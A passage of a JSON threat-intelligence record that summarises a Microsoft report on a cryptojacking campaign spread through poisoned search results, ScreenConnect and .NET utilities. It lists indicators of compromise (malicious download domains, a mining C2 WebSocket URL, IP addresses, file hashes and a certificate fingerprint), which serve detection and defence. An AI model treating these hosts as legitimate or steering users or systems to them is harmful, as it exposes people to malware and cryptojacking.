    "title": "From poisoned search results to GPU mining: A cryptojacking campaign abusing ScreenConnect and Microsoft .NET utilities",
    "publisher": "Microsoft Defender Experts and Microsoft Defender Security Research Team",
    "url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
    "published_at": "2026-05-26",
    "retrieved_at": "2026-05-27T00:00:00Z",
    "source_policy": "Original Microsoft source only. The Hacker News and other secondary summaries were intentionally not used for the chain content."
  },
  "x_source_reports": [
    {
      "publisher": "Microsoft Security Blog",
      "title": "From poisoned search results to GPU mining: A cryptojacking campaign abusing ScreenConnect and Microsoft .NET utilities",
      "url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "published_at": "2026-05-26",
      "authors": [
        "Microsoft Defender Experts",
        "Microsoft Defender Security Research Team"
      ]
    }
  ],
  "x_source_urls": [
    "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/"
  ],
  "x_resource_links_verified": [
    {
      "url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "status": "opened twice via web retrieval before packaging",
      "verified_at": "2026-05-27T00:00:00Z",
      "notes": "The page title, publication date, attack-chain sections, IOC table, and Microsoft authorship were checked against the original URL."
    }
  ],
  "x_iocs": {
    "domains": [
      "direct-download.gleeze.com",
      "start-download.gleeze.com",
      "direct-downloads.giize.com",
      "free-download.giize.com",
      "directdownload.icu"
    ],
    "urls": [
      "wss://minemine.gleeze.com:8443/ws"
    ],
    "ips": [
      "193.42.11.108",
      "93.115.10.35",
      "198.23.185.238",
      "2.59.132.106"
    ],
    "sha256": [
      "16562974deec80e41ef57a71a6de8c03ceb393005fb1432f8d9d82c61294ef8c",
      "1b2555b09ac62164638f47c8272beb6b0f97186e37d3a54cb84c723ff7a2eee5",
      "062bb28765fbaa11f8cc341fa16e2c7f942a122d929cb41f4a0f755b4429f246",
      "c7425fbe6c3a4937934215c54027d4b67202d12ab490682fae03498870d66d06",
      "a460d00ef93c8ce70d32e48e55781af66a53328fc2dde45519be196c265de074",
      "db2d33c4e6e4a5c2263b56e8303c343305a94dde1fc2968304ba260acbbd9f9f",
      "cf3f8160eb5a5580e0c35054847e3ac4d01e9fe74fab8bc12bf6e8a40bf696b2",
      "69077fcf940fc5852fb32beed15636756ebc04ac971b7ed71d36251e7ea70a20",
      "2ee93ccbcd49ed94c65dcf52e7dcb8f0fa0a443ca24c0e0c7f79152efba657b7",
      "9ff07c9fafa9c03fdf69e4abf6806aa7c938b5480e7e258f227db0719ecd6386",
      "7035c2abeb617e828dfda1b119b8544fa9ae15a1d263d18bc5506acaf381f496",
      "e021662a652ba95c8778b991056696ab3c9b0f60d5e23b1e6cf73c3847db6610"
    ],
    "certificate_fingerprint_sha256": [
      "EB:C3:5D:4A:08:D9:3A:88:0E:90:AE:AD:2D:3F:7F:B4:3F:DC:08:EA:77:DB:9D:D5:2F:80:78:1E:6B:FD:88:67"
    ]
  },
  "x_limitations": [
    "Microsoft does not publish the exact >150 fake utility landing domains; they are represented as a report-backed landing-domain set, not as fabricated domain IoCs.",
    "The exact malicious ZIP archive filenames and URLs are not published; ZIP staging is modeled through the published hosting domains and the report-described archive structure.",
    "The relation directdownload.icu -> 193.42.11.108 is marked likely because Microsoft publishes the ScreenConnect host parameter and the communicating IP, but not an explicit DNS resolution record.",
    "giize.com staging domains are marked as linked sibling infrastructure because Microsoft describes them as linked similar campaigns leading to the same infection chain.",
    "The runtime miner archive download is confirmed, but the archive source URL was not published."
  ],
  "x_selection_reason": "Strong public IIM candidate because the source describes a complete infrastructure chain: poisoned discovery surface, fake download domains, Dynamic DNS staging, archive delivery, RMM C2, hands-on file transfer, encrypted WebSocket C2, certificate-pivoted C2 infrastructure, and runtime miner delivery.",
  "x_publication_safety": "TLP:CLEAR / public OSINT conversion. No private telemetry beyond Microsoft-published report details was added."
}